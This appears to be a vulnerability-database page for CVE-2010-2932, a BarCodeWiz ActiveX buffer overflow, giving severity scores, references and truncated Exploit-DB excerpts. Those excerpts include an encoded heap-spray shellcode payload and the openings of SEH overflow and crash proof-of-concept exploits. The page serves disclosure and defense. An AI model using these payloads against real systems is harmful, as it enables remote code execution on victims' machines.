CVE-2010-2932
published 2010-08-05CVE-2010-2932: Buffer overflow in BarCodeWiz BarCode 3.29 ActiveX control (BarcodeWiz.dll) allows remote attackers to execute arbitrary code via a long argument to the…
PriorityP350critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.90%
93.3th percentile
Buffer overflow in BarCodeWiz BarCode 3.29 ActiveX control (BarcodeWiz.dll) allows remote attackers to execute arbitrary code via a long argument to the LoadProperties method.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| barcodewiz | barcode_activex_control | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Barcodewiz Barcode ActiveX Control 3.29 - Remote HeapSpray (Internet Explorer 6/7)
exploitdb·2010-07-31
CVE-2010-2932 Barcodewiz Barcode ActiveX Control 3.29 - Remote HeapSpray (Internet Explorer 6/7)
Barcodewiz Barcode ActiveX Control 3.29 - Remote HeapSpray (Internet Explorer 6/7)
---
// Payload is win32_exec - calc.exe
shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
nops=unescape('%u9090%u9090');
headersize = 69; //size adjusted for IE6/IE7 "universality"
slackspace= headersize + shellcode.length;
whil
Exploit-DB
Barcodewiz Barcode ActiveX Control 3.29 - Remote Buffer Overflow (SEH)
exploitdb·2010-07-30
CVE-2010-2932 Barcodewiz Barcode ActiveX Control 3.29 - Remote Buffer Overflow (SEH)
Barcodewiz Barcode ActiveX Control 3.29 - Remote Buffer Overflow (SEH)
---
# BarCodeWiz Barcode ActiveX Control 3.29 BoF (SEH)
# Bug found: 24th July 2010
# Author: loneferret
# Software: http://www.barcodewiz.com/
# Nods to exploit-db.com
# Vulnerable file BarCodeWiz.dll
# LoadProperties method
# Tested on: Windows XP Professional SP3 with Internet Explorer 6
# [Needs adjustment for Internet Explorer 7]
# Vendor contacted: 24th July 2010
# Vendor first reply: 26th July 2010: Wanting more information
# Vendor contacted: 26th July 2010: Sent 2 proof of concepts files
# Vendor contacted: 29 July 2010: Asked for update
# No Response from vendor: 30 July 2010
# Public Release : 30 July 2010
#
# Shellcode calc.exe
#
----HTML FILE FROM HERE ON-----
buffer = String(97,"A")
jmp = unescap
Exploit-DB
Barcodewiz BarCode ActiveX 3.29 - Denial of Service (PoC)
exploitdb·2010-07-30
CVE-2010-2932 Barcodewiz BarCode ActiveX 3.29 - Denial of Service (PoC)
Barcodewiz BarCode ActiveX 3.29 - Denial of Service (PoC)
---
# BarCodeWiz Barcode ActiveX Control 3.29 PoC (SEH)
# Bug found: 24th July 2010
# Found by: loneferret
# Software: http://www.barcodewiz.com/
# Nods to exploit-db.com
# Vulnerable file BarCodeWiz.dll
# LoadProperties method
# Tested on:
# Windows XP Professional SP3 & Windows XP Home SP3
# Internet Explorer 6 & Internet Explorer 7
# Vendor contacted: 24th July 2010
# Vendor first reply: 26th July 2010: Wanting more information
# Vendor contacted: 26th July 2010: Sent 2 proof of concepts files
# Vendor contacted: 29 July 2010: Asked for update
# No Response from vendor: 30 July 2010
# Public Release : 30 Juley 2010
# CPU Registers Information
#
# EAX 7EFEFEFE
# ECX 0013FBF8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
No writeups or analysis indexed.
http://secunia.com/advisories/40786http://www.exploit-db.com/exploits/14504http://www.exploit-db.com/exploits/14505http://www.exploit-db.com/exploits/14519http://www.securityfocus.com/bid/42097https://exchange.xforce.ibmcloud.com/vulnerabilities/60838http://secunia.com/advisories/40786http://www.exploit-db.com/exploits/14504http://www.exploit-db.com/exploits/14505http://www.exploit-db.com/exploits/14519http://www.securityfocus.com/bid/42097https://exchange.xforce.ibmcloud.com/vulnerabilities/60838
2010-08-05
Published